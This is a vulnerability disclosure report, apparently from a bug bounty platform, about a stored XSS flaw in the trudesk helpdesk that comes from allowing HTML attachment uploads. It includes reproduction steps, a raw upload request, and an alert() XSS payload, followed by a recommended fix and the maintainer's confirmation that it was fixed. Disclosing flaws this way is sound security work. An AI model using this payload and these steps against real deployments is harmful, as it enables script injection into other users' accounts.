Least Privilege Violation in polonel/trudesk


Reported on

Jun 15th 2021


Stored xss via file upload


Stored xss allow to execute arbitary javascript in victim trudesk account External user also can execute xss in admin account here.


1. First from admin goto http://localhost:8118/teams and create a team called team2.
Now goto http://localhost:8118/accounts/agents and add new user called user B with support role and assign him to above team2.\

2. Now as a external user goto http://localhost:8118/newissue and create a new ticket .

3. Now user B goto his account and here he can see above public ticket .
Now user B can upload attachment to this ticket .
Here user B can attach any file including html and html file can execute javascript .
When uploading html file bellow request is sent to server

POST /tickets/uploadattachment HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34732645982285409509843513490
Content-Length: 409
Origin: http://localhost:8118
Connection: close
Referer: http://localhost:8118/tickets/1004
Cookie: PHPSESSID=n3ofevpn16pm9p45ngraltrbtk; SMFCookie600=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%220bf82305176bf11c423867c0f41a1f7944174f1e%22%3Bi%3A2%3Bi%3A1812778653%3Bi%3A3%3Bi%3A2%3B%7D; ElkArteCookie700=%5B1%2C%22b34b4193d3296f9b57616347174aaf58503bf2226225496e5a159745bea75aba%22%2C1812793345%2C2%5D; _csrf=X6SB4CbNToC6T0TuClv-MPqa; express.sid=s%3A5tJvaz7mQH_plOxJ0Qm39QiZ0gZ6hpQ2.J5ipJrnNm3tGCLsqbRWuvnbIJBLL9XC3vHMTg4DEHCo; $trudesk%3Atimezone=America/New_York; connect.sid=s%3APvO_kBBiQoJLhJ-OvfW6Zgv0zwLxrTD0.owzip3EbVPWPph8Ac2o7Al34KE5gNPk08e0eyd%2B%2Bze4; io=EzJ4Vn6dOVHG5S_8AAAJ; $trudesk%3Asidebar%3Aexpanded=false

Content-Disposition: form-data; name="ticketId"

Content-Disposition: form-data; name="attachment"; filename="exif.html"
Content-Type: text/html

xss"'><img src=x onerror=alert(document.domain)>

After uploading user can access uploaded file using url like http://localhost:8118/uploads/tickets/60c632a56e8507002262a20a/attachment_exif.html .
if any user open this file then xss is executed .


when serving uploaded file dont render it . You can use Content-Disposition: attachment; filename="filename.html" header to prevent rendering html file , it will ask user to download the file


Chris Brame validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Chris Brame confirmed that a fix has been merged on 25c5ae a year ago
Chris Brame has been awarded the fix bounty
to join this conversation